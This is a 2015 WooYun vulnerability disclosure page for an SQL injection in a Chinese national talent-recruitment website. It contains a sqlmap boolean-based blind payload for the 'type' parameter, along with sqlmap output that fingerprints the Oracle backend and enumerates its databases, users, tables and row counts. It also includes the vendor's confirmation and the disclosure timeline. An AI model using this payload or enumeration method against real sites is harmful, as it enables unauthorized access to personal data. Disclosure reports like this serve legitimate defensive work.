当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142861

漏洞标题:中国国家人才网某处SQL注入漏洞可泄露几十万用户信息

相关厂商:中国国家人才网

漏洞作者: 路人甲

提交时间:2015-09-24 11:35

修复时间:2015-11-13 09:08

公开时间:2015-11-13 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

中国国家人才网某处注入漏洞,泄露几十万用户信息。。。。。。

详细说明:

注入链接:http://**.**.**.**/party/listAction!listTB_XXFB_Djkw.action?type=djkw_type
直接SQLMAP 跑出大量数据,国家人才网的数据啊。。。。。。。。。。
几十万信息数据。。。。
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| TB_CWGL_PAY | 369101 |
| TB_DAGL_DOCINFO | 120601 |
| TEMP | 113446 |
| TB_GGGL_BH | 36238 |
| TB_DYGL_INFO | 11561 |
| TB_DYGL_INFO_EAST | 8103 |
| BIL_ACCOUNT | 1143 |
| SY_S_ROLEFUNCTIONS | 742 |
| SY_D_FUNCTION | 534 |

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=djkw_type' AND 2134=2134 AND 'sfvD'='sfvD
---
[21:50:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [22]:
[*] BJEPN_PARTY_QGRC
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EPN_QGRC
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
web application technology: JSP
back-end DBMS: Oracle
[20:17:35] [INFO] fetching database users privileges
[20:17:35] [INFO] fetching database users
[20:17:35] [INFO] fetching number of database users
[20:17:35] [INFO] resumed: 29
[20:17:35] [INFO] resuming partial value: BJEPN_
[20:17:35] [WARNING] running in a single-thread mode. Please co
ption '--threads' for faster data retrieval
[20:17:35] [INFO] retrieved: PARTY_QGRC
[20:18:24] [INFO] retrieved: BI
[20:18:36] [INFO] retrieved: PM
[20:18:49] [INFO] retrieved: SH
[20:19:02] [INFO] retrieved: IX
[20:19:15] [INFO] retrieved: OE
[20:19:29] [INFO] retrieved: HR
[20:19:43] [INFO] retrieved: SCOTT
[20:20:11] [INFO] retrieved: MGMT_VIEW
[20:20:58] [INFO] retrieved: EPN_QGRC
[20:21:40] [INFO] retrieved: MDDATA
[20:22:11] [INFO] retrieved: SYSMAN
[20:22:42] [INFO] retrieved: MDSYS
[20:23:09] [INFO] retrieved: SI_INFORMTN_SCHEMA
[20:24:47] [INFO] retrieved: ORDPLUGINS
[20:25:39] [INFO] retrieved: ORDSYS
[20:26:12] [INFO] retrieved: OLAPSYS
[20:26:49] [INFO] retrieved: ANONYMOUS
[20:27:35] [INFO] retrieved: XDB
[20:27:58] [INFO] retrieved: CTXSYS
[20:28:31] [INFO] retrieved: EXFSYS
[20:29:03] [INFO] retrieved: WMSYS
[20:29:32] [INFO] retrieved: DBSNMP
[20:30:07] [INFO] retrieved: TSMSYS
[20:30:40] [INFO] retrieved: DMSYS
[20:31:08] [INFO] retrieved: DIP
[20:31:26] [INFO] retrieved: OUTLN
[20:31:53] [INFO] retrieved: SYSTEM
[20:32:25] [INFO] retrieved: SYS
current schema (equivalent to database on Oracle): 'BJEPN_PARTY_QGRC'
current user: 'BJEPN_PARTY_QGRC'


2.png


3.png


4.jpg


漏洞证明:

Database: BJEPN_PARTY_QGRC
[44 tables]
+---------------------+
| A1 |
| A_TEMP |
| BIL_ACCOUNT |
| RECEIPTLIST |
| SY_A_SETTING |
| SY_D_COMROLE |
| SY_D_FUNCTION |
| SY_D_LOG |
| SY_D_PARA |
| SY_D_PARATYPE |
| SY_D_PARATYPEV |
| SY_D_PARAV |
| SY_D_PORTAL |
| SY_D_PORTALUSER |
| SY_D_ROLE |
| SY_D_USER |
| SY_D_USERV |
| SY_S_ROLEFUNCTIONS |
| SY_S_USERROLES |
| TB_CWGL_PAY |
| TB_DAGL_DOCINFO |
| TB_DYGL_ARTICLE |
| TB_DYGL_EMAIL |
| TB_DYGL_INFO |
| TB_DYGL_INFO_EAST |
| TB_DYGL_LOG |
| TB_DYGL_MESSAGE |
| TB_DYGL_RECORD |
| TB_DYGL_SIGNUP |
| TB_DYGL_ZBINFO |
| TB_DYGL_ZBINFO_EAST |
| TB_GGGL_BEIJING |
| TB_GGGL_BH |
| TB_GGGL_HY |
| TB_GGGL_ZY |
| TB_UPLOAD |
| TB_XTGL_DEPT |
| TB_XTGL_POST |
| TB_XXFB_ABOUTUS |
| TB_XXFB_ACTIVE |
| TB_XXFB_NEWS |
| TB_XXFB_ZXZX |
| TB_ZHGL_VIP |
| TEMP |
+---------------------+
Database: BJEPN_PARTY_QGRC
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| TB_CWGL_PAY | 369101 |
| TB_DAGL_DOCINFO | 120601 |
| TEMP | 113446 |
| TB_GGGL_BH | 36238 |
| TB_DYGL_INFO | 11561 |
| TB_DYGL_INFO_EAST | 8103 |
| BIL_ACCOUNT | 1143 |
| SY_S_ROLEFUNCTIONS | 742 |
| SY_D_FUNCTION | 534 |
| TB_GGGL_BEIJING | 399 |
| TB_DYGL_LOG | 358 |
| SY_D_PARAV | 300 |
| TB_GGGL_ZY | 300 |
| TB_DYGL_ZBINFO | 248 |
| TB_XXFB_NEWS | 218 |
| TB_GGGL_HY | 136 |
| A_TEMP | 117 |
| TB_DYGL_ZBINFO_EAST | 98 |
| TB_UPLOAD | 84 |
| TB_ZHGL_VIP | 80 |
| SY_D_USERV | 50 |
| SY_D_PARATYPEV | 40 |
| TB_XXFB_ACTIVE | 33 |
| SY_D_USER | 32 |
| SY_D_PARA | 31 |
| TB_XTGL_POST | 31 |
| SY_S_USERROLES | 27 |
| SY_D_ROLE | 21 |
| SY_D_PARATYPE | 20 |
| TB_XXFB_ZXZX | 19 |
| TB_XTGL_DEPT | 17 |
| SY_D_PORTAL | 15 |
| SY_A_SETTING | 13 |
| TB_DYGL_ARTICLE | 8 |
| TB_DYGL_MESSAGE | 5 |
| TB_DYGL_SIGNUP | 5 |
| SY_D_PORTALUSER | 4 |
| TB_XXFB_ABOUTUS | 4 |
| SY_D_COMROLE | 3 |
| SY_D_LOG | 3 |
+---------------------+---------+


5.png


6.png


具体就不深入了。。。。。。。

修复方案:

你懂的。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 09:07

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向人力资源和社会保障部主管部门上报,由其后续协调网站管理单位处置.

最新状态:

暂无